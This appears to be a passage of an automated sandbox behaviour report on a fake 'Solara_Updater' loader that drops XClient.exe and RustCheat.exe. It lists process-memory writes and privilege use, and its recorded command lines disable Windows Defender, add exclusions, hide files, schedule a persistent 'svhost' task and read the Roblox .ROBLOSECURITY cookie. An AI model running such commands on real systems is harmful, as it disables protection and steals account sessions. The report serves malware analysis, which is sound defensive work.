N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2204 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2204 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2204 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2204 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2204 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2364 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2364 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2364 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1332 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1332 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1332 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1332 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 1332 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 1332 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2816 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2816 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2816 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2816 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1212 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1212 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1212 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2552 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2552 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2552 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1212 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1212 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "471020934-1427772490-572142708-1711754108-114883849119215268499784406681658966023"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\taskeng.exe

taskeng.exe {3E5015D7-882C-4837-9D08-B1BE7F1C1340} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

